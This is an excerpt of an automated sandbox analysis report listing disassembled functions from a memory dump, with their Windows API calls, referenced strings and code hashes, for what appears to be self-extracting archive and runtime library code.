Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: 0b4f702c7f17c1653b1e80d2f34bbb38330a867343502183a1bf7c401fd2e585
Instruction ID: 851f1199d652ef8f3bd48bad12fdbe9f6f93c38d404912b8fb0aa36bac72b1e8
Opcode Fuzzy Hash: 0b4f702c7f17c1653b1e80d2f34bbb38330a867343502183a1bf7c401fd2e585
Instruction Fuzzy Hash: D1315B22684705A6DA70FB549C42B7E73E4EBD0320F20C46FF5A9572D0FA64AD94C3A7

Function 00B8DA64 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B8DA28: _free.LIBCMT ref: 00B8DA51

_free.LIBCMT ref: 00B8DAB2

Part of subcall function 00B8A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,00B8DA56,?,00000000,?,00000000,?,00B8DA7D,?,00000007,?,?,00B8DE7A,?), ref: 00B8A680
Part of subcall function 00B8A66A: GetLastError.KERNEL32(?,?,00B8DA56,?,00000000,?,00000000,?,00B8DA7D,?,00000007,?,?,00B8DE7A,?,?), ref: 00B8A692

_free.LIBCMT ref: 00B8DABD
_free.LIBCMT ref: 00B8DAC8
_free.LIBCMT ref: 00B8DB1C
_free.LIBCMT ref: 00B8DB27
_free.LIBCMT ref: 00B8DB32
_free.LIBCMT ref: 00B8DB3D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
Instruction ID: 523749592d91bb9370499336dffa6ccce811cd55004614b39120c758cbdd0b0f
Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
Instruction Fuzzy Hash: D2119071954B04BAE620BBB1CC07FCB77ECAF15B10F440C66B39AA60B2EA74B505C751

Function 00B7F77A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00B7F7F5,00B7F758,00B7F9F9), ref: 00B7F791
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00B7F7A7
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00B7F7BC

Strings

KERNEL32.DLL, xrefs: 00B7F78C
ReleaseSRWLockExclusive, xrefs: 00B7F7B1
AcquireSRWLockExclusive, xrefs: 00B7F7A1

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 3f7611b12af36db67acdf7b698268d52b5d156514b412572fd07ab3129fe93e3
Instruction ID: c691f0499bd07fe3972d55d26fb32bc56c576724531607d3b78861269d13099e
Opcode Fuzzy Hash: 3f7611b12af36db67acdf7b698268d52b5d156514b412572fd07ab3129fe93e3
Instruction Fuzzy Hash: B7F0C2313012235F9B344F684DC5DB633DDDA05761325C4FBEA3AD3250DA10CC4196D9

Function 00B72799 Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00B727F1

Part of subcall function 00B6C619: GetVersionExW.KERNEL32(?), ref: 00B6C63E

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B72815
FileTimeToSystemTime.KERNEL32(?,?), ref: 00B7282F
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00B72842
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B72852
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B72862

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 53139920a9fdbc5c6ed20f7a3c68cd669d8add5a4c24fbbd6008843a8ed981eb
Instruction ID: 2b7597916529b9d6fdf5250c62f13286382a79e1f55ecc7370c6d4ac8feaa11b
Opcode Fuzzy Hash: 53139920a9fdbc5c6ed20f7a3c68cd669d8add5a4c24fbbd6008843a8ed981eb
Instruction Fuzzy Hash: 8A311775108316AFC704DFA8D88599BBBE8FF98714F009A1EF999D3210E730D549CBA6

Function 00B83C8A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00B83C81,00B83A3C,00B80BF4), ref: 00B83C98
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B83CA6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B83CBF
SetLastError.KERNEL32(00000000,00B83C81,00B83A3C,00B80BF4), ref: 00B83D11

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: a4d36f860a9b94e26977a6ca48b67773dea79926c3979de6bf08b8d205f37463
Instruction ID: 889f978ca144e6d668c47b85a00975627e57fc27035e82f3db0f6628222ce199
Opcode Fuzzy Hash: a4d36f860a9b94e26977a6ca48b67773dea79926c3979de6bf08b8d205f37463
Instruction Fuzzy Hash: AF0188321193125EA6243674BC96A2B3BD4FB42F75F2002BAF610661F1EF655D11DB84

Function 00B8A515 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00BA30C4,00B85982,00BA30C4,?,?,00B853FD,?,?,00BA30C4), ref: 00B8A519
_free.LIBCMT ref: 00B8A54C
_free.LIBCMT ref: 00B8A574
SetLastError.KERNEL32(00000000,?,00BA30C4), ref: 00B8A581
SetLastError.KERNEL32(00000000,?,00BA30C4), ref: 00B8A58D
_abort.LIBCMT ref: 00B8A593

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: f31a7019fb44fe61749af4c5b92d3d674990e4f75adb1a4b65dbc0022b44291b
Instruction ID: 973ba930ac86f76ff0240f5ab7c18af9785a12fc6b1eacd52a1651402b1a9a1f
Opcode Fuzzy Hash: f31a7019fb44fe61749af4c5b92d3d674990e4f75adb1a4b65dbc0022b44291b
Instruction Fuzzy Hash: 1EF0A475140500A7E2153324AD1AFAB3BE9DBE2B61F24019BFA14A31B2EF358D42C766

Function 00B7ED8B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B7ED97
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B7EDB1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B7EDC2
TranslateMessage.USER32(?), ref: 00B7EDCC
DispatchMessageW.USER32(?), ref: 00B7EDD6
WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B7EDE1

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: ef212061fab43338c56dd46c4bc9cc3abc00908e14588559ef7eea708250fd2a
Instruction ID: 3836909f027bd648f7000df9131d1e82efc978e3ac84211984f0a04d9addaa90
Opcode Fuzzy Hash: ef212061fab43338c56dd46c4bc9cc3abc00908e14588559ef7eea708250fd2a
Instruction Fuzzy Hash: 3AF03C72A01119ABCB306BA5EC4DDCF7E6DEF59351B108022B61AD3050DA74D586C7E0

Function 00B6D4D2 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00B71907: _wcslen.LIBCMT ref: 00B7190D

Part of subcall function 00B6CD5C: _wcsrchr.LIBVCRUNTIME ref: 00B6CD73

_wcslen.LIBCMT ref: 00B6D5A4
_wcslen.LIBCMT ref: 00B6D5EC

Strings

.rar, xrefs: 00B6D4EE, 00B6D541
.sfx, xrefs: 00B6D527
.exe, xrefs: 00B6D518

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: 2dffa97b924cca58e8f7bac29861a523710c4e28d984d877ed681c85b67454a1
Instruction ID: c7b78a12d8b3141904b0c35c22702ee2cbd7ea86271e46997b3d786e865c8335
Opcode Fuzzy Hash: 2dffa97b924cca58e8f7bac29861a523710c4e28d984d877ed681c85b67454a1
Instruction Fuzzy Hash: 2D413712E0031199C731AF38C85293B73E8EF61748B1549CEF89B5B481E7688D82C3A5

Function 00B7DFCC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 00B7DFE2

Part of subcall function 00B6CAA0: _wcslen.LIBCMT ref: 00B6CAA6

_swprintf.LIBCMT ref: 00B7E016

Part of subcall function 00B64A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B64A33

SetDlgItemTextW.USER32(?,00000066,00BB2892), ref: 00B7E036
EndDialog.USER32(?,00000001), ref: 00B7E143

Strings

%s%s%u, xrefs: 00B7E00B

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
String ID: %s%s%u
API String ID: 110358324-1360425832
Opcode ID: 008281ec90a38bb1ebd22c3fa87be409ae7b2d4cccec8dc16a4f4c70d8dbb8f6
Instruction ID: 37b688bc51527770ac19b5aca203d5eaebaba8241c6e9afc8bb77484b4eaa94f
Opcode Fuzzy Hash: 008281ec90a38bb1ebd22c3fa87be409ae7b2d4cccec8dc16a4f4c70d8dbb8f6
Instruction Fuzzy Hash: D7414B71900218AADF219BA48C56EEA77FCEF18744F4084E6FA1DE7151EF709A84CF61

Function 00B6CF32 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B6CF56
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00B6B505,?,?,00000800,?,?,00B6B4CA,?), ref: 00B6CFF4
_wcslen.LIBCMT ref: 00B6D06A

Strings

\\?\, xrefs: 00B6CF81, 00B6CFC8, 00B6D026, 00B6D07D
UNC, xrefs: 00B6CFD6

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: 05481359e5fe0a9835f216e957ad4cb8c158a8d06ee31dcf8424d330f31ccf6c
Instruction ID: 83ae552b28c1d919acffcd1e1f621ecb5d3476a3bcbdf30afa0e5e99fb9b4968
Opcode Fuzzy Hash: 05481359e5fe0a9835f216e957ad4cb8c158a8d06ee31dcf8424d330f31ccf6c
Instruction Fuzzy Hash: 3B41D632A00215BACF20AF64CC51DFA77EAEF49350F1085E5F968A3051E779DE57CA60

Function 00B7C8CD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 00B7C8DD
GetObjectW.GDI32(00000000,00000018,?), ref: 00B7C902
DeleteObject.GDI32(00000000), ref: 00B7C934
DeleteObject.GDI32(00000000), ref: 00B7C957

Part of subcall function 00B7B6D2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00B7C92D,00000066), ref: 00B7B6E5
Part of subcall function 00B7B6D2: SizeofResource.KERNEL32(00000000,?,?,?,00B7C92D,00000066), ref: 00B7B6FC
Part of subcall function 00B7B6D2: LoadResource.KERNEL32(00000000,?,?,?,00B7C92D,00000066), ref: 00B7B713
Part of subcall function 00B7B6D2: LockResource.KERNEL32(00000000,?,?,?,00B7C92D,00000066), ref: 00B7B722
Part of subcall function 00B7B6D2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00B7C92D,00000066), ref: 00B7B73D
Part of subcall function 00B7B6D2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,00B7C92D,00000066), ref: 00B7B74E
Part of subcall function 00B7B6D2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B7B7B7
Part of subcall function 00B7B6D2: GlobalUnlock.KERNEL32(00000000), ref: 00B7B7D6
Part of subcall function 00B7B6D2: GlobalFree.KERNEL32(00000000), ref: 00B7B7DD

Strings

], xrefs: 00B7C90A

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
String ID: ]
API String ID: 1428510222-3352871620
Opcode ID: 811758c1f372a8d2a9d69085de28c5102edde9ca1c7c3639d2c56eddd9166797
Instruction ID: d0af624e7e9e54a5f9db3549edfeed012762392c47775e790996b8a9f2643447
Opcode Fuzzy Hash: 811758c1f372a8d2a9d69085de28c5102edde9ca1c7c3639d2c56eddd9166797
Instruction Fuzzy Hash: 4801D63250060567CB2227649C05F7F7EFAEF81B51F044158FE28F7292DF718C459AA1

Function 00B7E750 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00B612F6: GetDlgItem.USER32(00000000,00003021), ref: 00B6133A
Part of subcall function 00B612F6: SetWindowTextW.USER32(00000000,00B945F4), ref: 00B61350

EndDialog.USER32(?,00000001), ref: 00B7E79B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00B7E7B1
SetDlgItemTextW.USER32(?,00000066,?), ref: 00B7E7C5
SetDlgItemTextW.USER32(?,00000068), ref: 00B7E7D4

Strings

RENAMEDLG, xrefs: 00B7E768

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: b6a7d191fe1bd7c825908a00a295cef89ba06edae9fbd9855ceb3d6e232587a1
Instruction ID: 715cd72e9deb568bff9d5c822396973f2b0c993cb580b7973e23830f57c5e6b0
Opcode Fuzzy Hash: b6a7d191fe1bd7c825908a00a295cef89ba06edae9fbd9855ceb3d6e232587a1
Instruction Fuzzy Hash: F30124322813107AE2248B689C89F673BEDFF4E701F048891F365B70D0CEA2EC148765

Function 00B89235 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B891E6,?,?,00B89186,?,00B9D570,0000000C,00B892DD,?,00000002), ref: 00B89255
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B89268
FreeLibrary.KERNEL32(00000000,?,?,?,00B891E6,?,?,00B89186,?,00B9D570,0000000C,00B892DD,?,00000002,00000000), ref: 00B8928B

Strings

CorExitProcess, xrefs: 00B89260
mscoree.dll, xrefs: 00B8924E

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: c384abea8565b18e6c5f50038e832ba421cb05ca0ea6f1b55ad7a8c9c67c2a76
Instruction ID: 17575d338f662d4101a9750574da1d043bef820999bfe51738766696fdf24403
Opcode Fuzzy Hash: c384abea8565b18e6c5f50038e832ba421cb05ca0ea6f1b55ad7a8c9c67c2a76
Instruction Fuzzy Hash: 53F03C30A54208BBDF51AFA4DC09BADBFF4EB44755F0541A9F905A2171CF309E41CB90

Function 00B70627 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00B71B3B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B71B56
Part of subcall function 00B71B3B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B7063A,Crypt32.dll,00000000,00B706B4,00000200,?,00B70697,00000000,00000000,?), ref: 00B71B78

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B70646
GetProcAddress.KERNEL32(00BAA1F0,CryptUnprotectMemory), ref: 00B70656

Strings

CryptUnprotectMemory, xrefs: 00B7064C
CryptProtectMemory, xrefs: 00B70640
Crypt32.dll, xrefs: 00B70630

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: a1e99c46db1720f36cb625be00eb4d414e91f1ce0749a08009dc00a34d4ead37
Instruction ID: 940dea49845e1a3e5d8df4bb318a93efbc85b9563cdace5ddcdfecaef200e544
Opcode Fuzzy Hash: a1e99c46db1720f36cb625be00eb4d414e91f1ce0749a08009dc00a34d4ead37
Instruction Fuzzy Hash: AAE086708157119EDB306F78E958F027FE49F14700F00C8AEE2DA93261DBB4D4428B10

Function 00B83D6A Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00B83E31
___AdjustPointer.LIBCMT ref: 00B83E54
_abort.LIBCMT ref: 00B83EA2
___AdjustPointer.LIBCMT ref: 00B83EF0

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: 43c497070193b5770e2fab59ff205a138a4aef31a3c157fd3efbf41e0dd68489
Instruction ID: f9cccf86b62e71c904bb40b3a2b6e2371ea828eb3bb0c99d90fb862bfc30ab92
Opcode Fuzzy Hash: 43c497070193b5770e2fab59ff205a138a4aef31a3c157fd3efbf41e0dd68489
Instruction Fuzzy Hash: 8C51CD72600202DFEB29AF15D891B6AB7E4EF54F11F1445ADEC02572B0E775EE80CBA0

Function 00B8D0F0 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00B8D0F9
